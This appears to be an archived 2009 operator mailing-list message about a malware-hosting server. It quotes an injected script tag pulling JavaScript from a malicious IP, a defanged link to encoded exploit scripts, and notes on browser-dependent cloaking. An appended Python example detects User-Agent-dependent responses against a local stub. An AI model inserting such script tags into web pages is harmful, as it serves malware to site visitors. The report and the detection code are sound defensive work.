[nsp-sec] ATTN AS 12553 malware hosting
Mike Tancsa
mike at sentex.net
Wed Apr 8 11:22:50 EDT 2009
At 11:07 AM 4/8/2009, Jose Nazario wrote:
>On Wed, 8 Apr 2009, Mike Tancsa wrote:
>
>><script src = //94.247.2.195 / jquery.js> </script>
>
>despite the following which says it's benign:
>
>http://wepawet.cs.ucsb.edu/view.php?hash=8f39008bc3088b58c32e1c6f1559ae50&type=js
>
>phoneyc finds an issue. it leads to:
>
> hxxp://94.247.2.195/news/?id=100
>
>which is doubly encoded and leads to some VBS and some JS that looks
>like an IE exploit. AV did not detect the encoded script with any assistance.
The server is smart enough to give different responses based on the
browser. I initially used just fetch, but then my colleague used a
perl script to say he was IE6 on windows XP. The response was a
different script.
The file attached contains more obfuscated code.
---Mike
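
An added example, not part of the original message: one way to check whether a URL returns different content depending on the User-Agent header, as described above. The profile names, the User-Agent strings and the local stub server are constructed for illustration; the stub stands in for a host that varies its response by browser.

```python
import hashlib
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# User-Agent profiles to compare (constructed sample strings).
PROFILES = {
    "fetch": "fetch libfetch/2.0",
    "ie6-xp": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
}
# Direct connections only: ignore proxy settings from the environment.
_OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))

def fetch_as(url, user_agent, timeout=10):
    """Fetch url with the given User-Agent and return the raw body bytes."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with _OPENER.open(req, timeout=timeout) as resp:
        return resp.read()

def compare_profiles(url, profiles=PROFILES):
    """Return ({profile: sha256 of body}, True if bodies differ by profile)."""
    digests = {name: hashlib.sha256(fetch_as(url, ua)).hexdigest()
               for name, ua in profiles.items()}
    return digests, len(set(digests.values())) > 1

class _CloakingStub(BaseHTTPRequestHandler):
    """Constructed local stand-in: body depends on the User-Agent header."""
    def do_GET(self):
        ua = self.headers.get("User-Agent", "")
        body = b"/* variant B */" if "MSIE 6.0" in ua else b"/* variant A */"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)
    def log_message(self, *args):  # suppress per-request logging
        pass

def demo():
    """Run the comparison against the local stub on an ephemeral port."""
    server = HTTPServer(("127.0.0.1", 0), _CloakingStub)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return compare_profiles(f"http://127.0.0.1:{server.server_port}/")
    finally:
        server.shutdown()
        server.server_close()

if __name__ == "__main__":
    digests, differs = demo()
    for name, digest in digests.items():
        print(f"{name:8} {digest}")
    print("User-Agent dependent response:", differs)
```

Differing digests only show that the response varies with the User-Agent; each body still has to be decoded and inspected separately.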